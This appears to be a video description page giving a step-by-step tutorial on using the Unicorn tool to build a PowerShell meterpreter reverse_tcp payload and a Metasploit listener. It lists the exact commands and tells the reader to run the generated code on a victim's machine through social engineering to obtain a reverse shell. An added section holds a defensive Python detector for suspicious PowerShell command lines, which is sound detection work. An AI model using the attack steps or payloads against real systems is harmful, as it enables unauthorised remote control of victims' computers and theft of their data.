Office macro payload created with Unicorn
Magic Unicorn is a simple tool for using a PowerShell downgrade attack that injects shellcode straight into memory. It is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Important notice: I am not responsible for any misuse of any information, and I disclaim all responsibility for any misuse. If you misuse anything related to hacking, you will be subject to legal accountability and severe imprisonment by the authorities of your country. I am permitted to use hacking because this is my field of work, and I hold a permit from the government of the United States of America.
Table of Contents
Powershell Attack Instruction
HTA Attack Instruction
Macro Attack Instruction
Download the Unicorn tool from the git repository:
git clone https://github.com/trustedsec/unicorn.git
Once downloaded, go into the directory and run Unicorn with the following command to see all the possible methods.
./unicorn.py
PowerShell Attack Instructions
First, we will try the reverse_tcp payload. As we can see in the main menu, all the commands are already written. We just need to replace the IP with our IP.
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 4444
This gives us two files. One is a text file named “powershell_attack.txt”, which has the PowerShell code that will be run on the victim’s machine using social engineering, and the other is “unicorn.rc”, a custom Metasploit file that automatically sets all the parameters and starts a listener.
These files are saved in the directory where Unicorn was cloned. powershell_attack.txt holds the malicious code; when the victim executes that code in a command prompt, the attacker gets a reverse connection from the victim’s machine.
Now let’s set up a listener first. We need to run the Metasploit “unicorn.rc” file using the following command:
msfconsole -r unicorn.rc
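For the defender's side of the step where PowerShell code is run in a victim's command prompt, here is an added example (not from the original page or the Unicorn project) that scores process-creation command lines for traits common to PowerShell one-liner launchers. The switch list, weights, threshold and sample command lines are assumptions constructed for illustration and are not taken from Unicorn's actual output.

```python
import base64

# Assumed heuristics for illustration; tune switches, weights and threshold locally.
PARAMS = {"encodedcommand": (1, {"ec"}), "windowstyle": (1, set()),
          "noprofile": (3, set()), "executionpolicy": (2, {"ep"})}  # name: (min prefix, aliases)
VALUE_FLAGS = {"windowstyle": ("hidden", "hidden_window"),
               "executionpolicy": ("bypass", "policy_bypass")}
WEIGHTS = {"encodedcommand": 3, "hidden_window": 2, "policy_bypass": 2,
           "noprofile": 1, "32bit_host": 1}
THRESHOLD = 4

def canonical(token):
    # powershell.exe accepts shortened switches (-e, -enc, -ec, -nop, -w ...).
    name = token[1:].lower() if token[0] in "-/" else ""
    for full, (min_len, aliases) in PARAMS.items():
        if name in aliases or (len(name) >= min_len and full.startswith(name)):
            return full
    return None

def decode_arg(arg):
    # -EncodedCommand carries Base64 of UTF-16LE text; decode it for analyst triage.
    try:
        return base64.b64decode(arg, validate=True).decode("utf-16-le")
    except ValueError:
        return None

def analyse(cmdline):
    tokens = cmdline.split()
    host = next((i for i, t in enumerate(tokens) if "powershell" in t.lower()), None)
    found, decoded = set(), None
    args = tokens[host + 1:] if host is not None else []
    if host is not None and "syswow64" in tokens[host].lower():
        found.add("32bit_host")  # 32-bit PowerShell host on a 64-bit system
    for tok, nxt in zip(args, args[1:] + [""]):
        param = canonical(tok)
        if param == "encodedcommand":
            decoded = decode_arg(nxt)
        if param in ("encodedcommand", "noprofile"):
            found.add(param)
        elif param in VALUE_FLAGS and nxt.lower() == VALUE_FLAGS[param][0]:
            found.add(VALUE_FLAGS[param][1])
    score = sum(WEIGHTS[f] for f in found)
    return {"findings": sorted(found), "score": score, "decoded": decoded,
            "suspicious": score >= THRESHOLD}

# Constructed sample command lines (not captured from a host or produced by the tool).
_B64 = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
SUSPICIOUS_SAMPLE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -ec " + _B64
BENIGN_SAMPLE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\backup.ps1"
if __name__ == "__main__": print(analyse(SUSPICIOUS_SAMPLE), analyse(BENIGN_SAMPLE))
```

In practice the command lines would come from process-creation telemetry such as Windows Security event 4688 or Sysmon event 1, and the decoded text would be handed to an analyst rather than executed.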
Video “Office macro payload created with Unicorn” from the channel anonymous
Video information
15 February 2022, 13:22:39
00:03:10